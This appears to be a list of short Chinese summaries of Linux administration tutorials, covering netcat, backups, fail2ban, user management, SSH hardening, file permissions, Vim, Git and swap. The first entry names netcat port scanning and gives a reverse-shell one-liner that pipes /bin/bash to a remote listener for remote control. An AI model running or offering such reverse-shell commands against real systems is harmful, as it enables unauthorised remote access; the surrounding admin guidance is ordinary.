-
掌握netcat需熟悉其五大功能:1、用“nc-vhostport”建立TCP/UDP连接并通信;2、通过“nc-l-pport”监听本地端口接收数据;3、结合重定向实现文件传输,如“nc-l-p9999>file”接收,“catfile|ncip9999”发送;4、使用“nc-z-vipport-range”扫描开放端口,支持TCP/UDP;5、执行“nc-l-p4444”监听并用“ncip4444-e/bin/bash”反弹shell,实现远程控制。
-
Linux数据备份是保障系统与文件安全的关键措施,绝非可有可无。1.选择合适的工具和策略,如cp、tar用于基础备份,rsync实现高效同步,dd或Timeshift进行系统级快照,BorgBackup等支持高级功能;2.遵循“3-2-1”原则,确保至少三份副本、两种介质、一份异地存储;3.定期备份并测试恢复流程,验证备份有效性;4.数据恢复时需冷静评估损失、定位备份、准备环境、执行恢复并验证结果,避免覆盖原始备份,注意权限与服务状态。备份与恢复应作为日常维护的必要环节,而非临时应对措施。
-
fail2ban可有效防御SSH暴力破解,通过安装配置该工具并设置jail.local规则,结合邮件告警与防火墙集成,实现自动封禁异常IP。
-
创建与删除Linux用户需使用useradd和userdel命令,可结合passwd设置密码,通过usermod赋予sudo权限,图形界面也可操作,批量管理可用Shell脚本自动化处理。
-
使用wc-l命令可统计文件行数,如wc-lfilename.txt输出行数与文件名,通过wc-l<filename.txt或awk提取纯数字,适用于脚本处理。
-
修改SSH端口可提升安全性,首先编辑/etc/ssh/sshd_config文件,将Port22改为新端口如2222,保存后配置防火墙允许新端口,Ubuntu使用ufwallow2222,CentOS使用firewall-cmd添加规则,随后重启SSH服务systemctlrestartssh,保留原会话并测试新端口连接,确认可用后可注释Port22并重启服务完成加固。
-
Linux文件系统权限核心在于界定“谁”对文件或目录能执行“何种操作”,主要通过chmod、chown、chgrp等命令控制读、写、执行权限,分别针对所有者、所属组和其他用户。1.chmod用于修改权限,支持数字模式(如755、644)和符号模式(如u+x、go-w);2.chown用于更改所有者和所属组;3.chgrp专门改变所属组;4.umask设置新建文件或目录的默认权限;5.特殊权限位包括SetUID(赋予执行者所有者权限)、SetGID(赋予执行者组权限)、StickyBit(防止非所有者删除文
-
使用userdel-r可彻底删除用户及家目录;若残留则需手动清理/home、/var/mail等目录,删除crontab/at任务及systemd用户服务,并验证id、/etc/passwd及文件属主无残留。
-
Vim是Linux下高效文本编辑器,含普通/插入/命令行三模式;掌握启动退出、光标移动、编辑删除、查找替换及窗口分割技巧可大幅提升配置与脚本编写效率。
-
首先安装解压工具,更新软件包列表后依次安装unzip、rar和unrar;接着使用unzip命令解压ZIP文件,通过-d参数指定输出目录;然后用unrarx命令解压RAR文件,或用unrarl查看内容;最后也可通过图形界面右键操作完成解压。
-
需启用SSH服务并配置密钥认证:一、安装启动sshd并设开机自启;二、本地生成4096位RSA密钥对且私钥权限600;三、手动或用ssh-copy-id将公钥写入服务器authorized_keys;四、修改sshd_config启用PubkeyAuthentication并禁用PasswordAuthentication,最后重启服务。
-
需用venv或conda创建隔离环境:venv内置轻量,conda跨平台支持多语言;二者均支持创建、激活、导出/重建及删除环境,操作步骤明确且互不兼容。
-
Git需先安装、配置用户信息、初始化仓库并配置SSH密钥:1.依发行版用apt/dnf/yum安装;2.用gitconfig--global设用户名与邮箱;3.gitinit初始化仓库;4.用ssh-keygen生成ed25519密钥,ssh-add加载,复制公钥至GitHub等平台添加并ssh-T测试。
-
首先使用md5sum命令生成文件MD5值,通过sha256sum获取更安全的SHA-256值,还可选用sha1sum、sha512sum等工具,最后利用-c参数批量校验文件完整性。
-
可通过添加Swap分区、创建Swap文件或扩展LVM逻辑卷三种方式增加系统内存处理能力。首先使用fdisk创建新分区并格式化为Swap类型,启用后写入fstab实现开机挂载;其次在无需分区情况下,用dd命令生成指定大小文件,设置权限并格式化启用,同样需写入fstab持久化;最后若Swap位于LVM上,可先关闭原Swap卷,通过lvresize扩展容量,重新格式化并启用,完成扩容。
